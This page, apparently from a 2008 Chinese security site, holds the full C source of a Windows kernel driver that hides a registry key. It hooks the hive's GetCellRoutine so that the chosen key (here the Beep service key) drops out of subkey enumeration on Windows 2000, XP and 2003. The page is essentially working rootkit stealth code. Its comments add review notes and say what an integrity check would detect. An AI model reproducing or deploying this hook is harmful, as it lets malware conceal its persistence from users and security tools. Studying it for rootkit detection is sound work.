

隐藏注册表项代码

2008-9-9 17:35| 投稿: security

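#include <ntddk.h>

/*
 * Registry-key hiding by hooking a hive's GetCellRoutine.
 *
 * The Configuration Manager resolves every cell index through
 * HHIVE.GetCellRoutine.  This driver replaces that routine for the hive that
 * holds the target key.  When the hidden key's node is requested, the hook
 * hands back the node of the parent's last (stable) subkey instead, and when
 * that last node is requested afterwards it returns NULL, so an index-based
 * subkey enumeration stops before the hidden key is ever reported.
 *
 * Scope and caveats visible in this file:
 *  - Only 32-bit build numbers 2195 (Win2000), 2600 (WinXP) and 3790 (Win2003)
 *    are accepted; the KeyControlBlock field offsets are hard-coded per build
 *    and HANDLE is used as a 32-bit cell index.
 *  - Only the parent's stable subkey list (SubKeyLists[0]) is consulted.
 *  - The hook keeps its state in globals shared by every caller of the hive's
 *    GetCellRoutine (see MyGetCellRoutine).
 *  - After DriverEntry, HHIVE.GetCellRoutine of the hooked hive points into
 *    this driver rather than the kernel image; that is the artifact an
 *    integrity check on the hive structure would look for.
 */

/* Reads the PVOID stored at byte offset <offset>Offset inside ptr. */
#define GET_PTR(ptr, offset) \
    ( *(PVOID*)( (ULONG_PTR)(ptr) + (offset##Offset) ) )

/* CM_KEY_INDEX signatures; the two ASCII bytes appear in memory as shown. */
#define CM_KEY_INDEX_ROOT 0x6972 // "ri"
#define CM_KEY_INDEX_LEAF 0x696c // "li"
#define CM_KEY_FAST_LEAF  0x666c // "lf"
#define CM_KEY_HASH_LEAF  0x686c // "lh"

/*
 * Debugger dumps the partial structures below were derived from:
 *
 * lkd> dt _HHIVE
 * nt!_HHIVE
 *    +0x000 Signature          : Uint4B
 *    +0x004 GetCellRoutine     : Ptr32 _CELL_DATA*
 *    +0x008 ReleaseCellRoutine : Ptr32 void
 *    +0x00c Allocate           : Ptr32 void*
 *    +0x010 Free               : Ptr32 void
 *    +0x014 FileSetSize        : Ptr32 unsigned char
 *    +0x018 FileWrite          : Ptr32 unsigned char
 *    +0x01c FileRead           : Ptr32 unsigned char
 *    +0x020 FileFlush          : Ptr32 unsigned char
 *    +0x024 BaseBlock          : Ptr32 _HBASE_BLOCK
 *    +0x028 DirtyVector        : _RTL_BITMAP
 *    +0x030 DirtyCount         : Uint4B
 *    +0x034 DirtyAlloc         : Uint4B
 *    +0x038 RealWrites         : UChar
 *    +0x03c Cluster            : Uint4B
 *    +0x040 Flat               : UChar
 *    +0x041 ReadOnly           : UChar
 *    +0x042 Log                : UChar
 *    +0x044 HiveFlags          : Uint4B
 *    +0x048 LogSize            : Uint4B
 *    +0x04c RefreshCount       : Uint4B
 *    +0x050 StorageTypeCount   : Uint4B
 *    +0x054 Version            : Uint4B
 *    +0x058 Storage            : [2] _DUAL
 *
 * lkd> dt _CM_KEY_NODE
 * nt!_CM_KEY_NODE
 *    +0x000 Signature          : Uint2B
 *    +0x002 Flags              : Uint2B
 *    +0x004 LastWriteTime      : _LARGE_INTEGER
 *    +0x00c Spare              : Uint4B
 *    +0x010 Parent             : Uint4B
 *    +0x014 SubKeyCounts       : [2] Uint4B
 *    +0x01c SubKeyLists        : [2] Uint4B
 *    +0x024 ValueList          : _CHILD_LIST
 *    +0x01c ChildHiveReference : _CM_KEY_REFERENCE
 *    +0x02c Security           : Uint4B
 *    +0x030 Class              : Uint4B
 *    +0x034 MaxNameLen         : Uint4B
 *    +0x038 MaxClassLen        : Uint4B
 *    +0x03c MaxValueNameLen    : Uint4B
 *    +0x040 MaxValueDataLen    : Uint4B
 *    +0x044 WorkVar            : Uint4B
 *    +0x048 NameLength         : Uint2B
 *    +0x04a ClassLength        : Uint2B
 *    +0x04c Name               : [1] Uint2B
 */

// Partial CM data structures: only the leading members used here are declared.
#pragma pack(1)
typedef struct _CM_KEY_NODE {
    USHORT        Signature;
    USHORT        Flags;
    LARGE_INTEGER LastWriteTime;
    ULONG         Spare;           // used to be TitleIndex
    HANDLE        Parent;          // cell index of the parent key node
    ULONG         SubKeyCounts[2]; // Stable and Volatile
    HANDLE        SubKeyLists[2];  // Stable and Volatile
    // ...
} CM_KEY_NODE, *PCM_KEY_NODE;

typedef struct _CM_KEY_INDEX {
    USHORT Signature;
    USHORT Count;
    HANDLE List[1];                // Count entries (2*Count for lf/lh leaves)
} CM_KEY_INDEX, *PCM_KEY_INDEX;

typedef struct _CM_KEY_BODY {
    ULONG      Type;               // "ky02"
    PVOID      KeyControlBlock;
    PVOID      NotifyBlock;
    PEPROCESS  Process;            // the owner process
    LIST_ENTRY KeyBodyList;        // key bodies sharing the same KCB
} CM_KEY_BODY, *PCM_KEY_BODY;

typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE);

typedef struct _HHIVE {
    ULONG             Signature;
    PGET_CELL_ROUTINE GetCellRoutine;
    PVOID             ReleaseCellRoutine;
    // ...
} HHIVE, *PHHIVE;
#pragma pack()

NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath);
// DRIVER_UNLOAD returns VOID; declaring it NTSTATUS mismatches the
// DriverObject->DriverUnload pointer type.
VOID DriverUnload(PDRIVER_OBJECT pDrvObj);

#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, DriverUnload)
#endif // ALLOC_PRAGMA

// Full path of the key to hide.
WCHAR g_HideKeyName[] = L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Beep";

PGET_CELL_ROUTINE  g_pGetCellRoutine  = NULL; // original routine of the hooked hive
PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL; // &Hive->GetCellRoutine, for unhooking
PCM_KEY_NODE       g_HideNode         = NULL; // node of the key being hidden
PCM_KEY_NODE       g_LastNode         = NULL; // last sibling node handed out instead

/*
 * Opens the key named pwcsKeyName for KEY_READ as a kernel handle.
 * Returns the handle, or NULL on failure (the status is logged).  The caller
 * owns the handle and must ZwClose it.
 */
HANDLE OpenKeyByName(PCWSTR pwcsKeyName)
{
    NTSTATUS          status;
    UNICODE_STRING    uKeyName;
    OBJECT_ATTRIBUTES oa;
    HANDLE            hKey;

    RtlInitUnicodeString(&uKeyName, pwcsKeyName);
    InitializeObjectAttributes(&oa, &uKeyName,
                               OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
    status = ZwOpenKey(&hKey, KEY_READ, &oa);
    if (!NT_SUCCESS(status)) {
        DbgPrint("ZwOpenKey Failed: %lx\n", status);
        return NULL;
    }
    return hKey;
}

/*
 * Returns the KeyControlBlock pointer stored in the key body behind hKey,
 * or NULL if hKey is NULL or cannot be referenced.  The returned pointer is
 * not referenced; it is only valid for as long as hKey stays open.
 */
PVOID GetKeyControlBlock(HANDLE hKey)
{
    NTSTATUS     status;
    PCM_KEY_BODY KeyBody;
    PVOID        KCB;

    if (hKey == NULL) return NULL;

    // Handle -> object body (CM_KEY_BODY).
    status = ObReferenceObjectByHandle(hKey, KEY_READ, NULL, KernelMode,
                                       &KeyBody, NULL);
    if (!NT_SUCCESS(status)) {
        DbgPrint("ObReferenceObjectByHandle Failed: %lx\n", status);
        return NULL;
    }

    KCB = KeyBody->KeyControlBlock;
    DbgPrint("KeyControlBlock = %lx\n", KCB);
    ObDereferenceObject(KeyBody);
    return KCB;
}

/*
 * Returns the node of the last subkey in the stable subkey list of Node's
 * parent, or NULL when any cell on the way cannot be resolved or an index
 * is empty (the original code indexed List[Count-1] unconditionally, which
 * with Count == 0 reads far outside the index).
 */
PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node)
{
    PCM_KEY_NODE  ParentNode;
    PCM_KEY_INDEX Index;

    ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent);
    if (ParentNode == NULL) return NULL;

    // Only the stable list is considered; SubKeyLists[1] (volatile) is ignored.
    Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]);
    DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index);
    if (Index == NULL || Index->Count == 0) return NULL;

    // A root index ("ri") is two-level: descend into its last leaf.
    if (Index->Signature == CM_KEY_INDEX_ROOT) {
        Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count - 1]);
        DbgPrint("Index = %lx\n", Index);
        if (Index == NULL || Index->Count == 0) return NULL;
    }

    if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF) {
        // Fast leaf (2k) and hash leaf (XP/2k3) store {cell, hint} pairs,
        // so the cell of entry i is at List[2*i].
        return g_pGetCellRoutine(Hive, Index->List[2 * (Index->Count - 1)]);
    }

    // Plain leaf index ("li"): one cell per entry.
    return g_pGetCellRoutine(Hive, Index->List[Index->Count - 1]);
}

/*
 * Replacement for HHIVE.GetCellRoutine.  Calls the original and then:
 *  - if the result is the hidden node, resolves the parent's last subkey,
 *    remembers it in g_LastNode and returns it instead (or NULL when the
 *    hidden node is itself the last subkey, or when lookup fails);
 *  - if the result is the remembered g_LastNode, clears it and returns NULL.
 *
 * NOTE(review): g_LastNode is a single global.  Any caller of this hive's
 * GetCellRoutine — not only the subkey enumeration this is aimed at — sees
 * the substitution, and a g_LastNode left behind by a walk that stopped
 * before reaching the last sibling makes the next unrelated fetch of that
 * sibling return NULL.
 */
PVOID __stdcall MyGetCellRoutine(PVOID Hive, HANDLE Cell)
{
    PVOID pRet = g_pGetCellRoutine(Hive, Cell);

    if (pRet == NULL) return NULL;

    if (pRet == g_HideNode) {
        DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet);
        pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode);
        DbgPrint("g_LastNode = %lx\n", g_LastNode);
        // The hidden key is itself the last subkey: nothing to substitute.
        if (pRet == g_HideNode) pRet = NULL;
    } else if (pRet == g_LastNode) {
        DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet);
        // Consumed: end the enumeration here and forget the substitute.
        pRet = g_LastNode = NULL;
    }

    return pRet;
}

/*
 * Restores the hive's original GetCellRoutine if DriverEntry installed the
 * hook.
 *
 * NOTE(review): nothing here waits for an in-flight MyGetCellRoutine call to
 * return before the image is unmapped.
 */
VOID DriverUnload(PDRIVER_OBJECT pDrvObj)
{
    UNREFERENCED_PARAMETER(pDrvObj);
    PAGED_CODE();

    DbgPrint("DriverUnload()\n");
    if (g_ppGetCellRoutine != NULL && g_pGetCellRoutine != NULL) {
        *g_ppGetCellRoutine = g_pGetCellRoutine;
        g_ppGetCellRoutine = NULL;
    }
}

/*
 * Locates the hive and key node of g_HideKeyName and hooks that hive's
 * GetCellRoutine.  Returns STATUS_NOT_SUPPORTED on an unknown build (or a
 * checked kernel, for which PsGetVersion returns TRUE), STATUS_UNSUCCESSFUL
 * when the key/KCB/node cannot be resolved (the original returned
 * STATUS_SUCCESS in that case, leaving the driver loaded with no hook), and
 * STATUS_SUCCESS once the hook is in place.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath)
{
    ULONG    BuildNumber;
    ULONG    KeyHiveOffset;   // offset of KeyControlBlock->KeyHive
    ULONG    KeyCellOffset;   // offset of KeyControlBlock->KeyCell
    HANDLE   hKey;
    PVOID    KCB;
    PHHIVE   Hive;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    UNREFERENCED_PARAMETER(pRegPath);

    DbgPrint("DriverEntry()\n");
    pDrvObj->DriverUnload = DriverUnload;

    if (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) return STATUS_NOT_SUPPORTED;
    DbgPrint("BuildNumber = %d\n", BuildNumber);

    // The KeyControlBlock layout differs slightly per build.  (A cell index is
    // normally below 0x80000000 while a hive pointer is above it, which could
    // also be used to tell the two fields apart.)
    switch (BuildNumber) {
    case 2195: // Win2000
        KeyHiveOffset = 0xc;
        KeyCellOffset = 0x10;
        break;
    case 2600: // WinXP
    case 3790: // Win2003
        KeyHiveOffset = 0x10;
        KeyCellOffset = 0x14;
        break;
    default:
        return STATUS_NOT_SUPPORTED;
    }

    hKey = OpenKeyByName(g_HideKeyName);
    if (hKey == NULL) return STATUS_UNSUCCESSFUL;

    // Everything read from the KCB below happens while hKey is still open.
    KCB = GetKeyControlBlock(hKey);
    if (KCB != NULL) {
        Hive = (PHHIVE)GET_PTR(KCB, KeyHive);
        if (Hive != NULL && Hive->GetCellRoutine != NULL) {
            // The routine lives in the hive (HHIVE), not in the KCB; keep both
            // its address and its value so DriverUnload can restore it.
            g_ppGetCellRoutine = &Hive->GetCellRoutine;
            g_pGetCellRoutine  = Hive->GetCellRoutine;
            DbgPrint("GetCellRoutine = %lx\n", g_pGetCellRoutine);

            g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell));
            if (g_HideNode != NULL) {
                Hive->GetCellRoutine = MyGetCellRoutine;
                status = STATUS_SUCCESS;
            } else {
                g_ppGetCellRoutine = NULL;
                g_pGetCellRoutine  = NULL;
            }
        }
    }

    ZwClose(hKey);
    return status;
}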





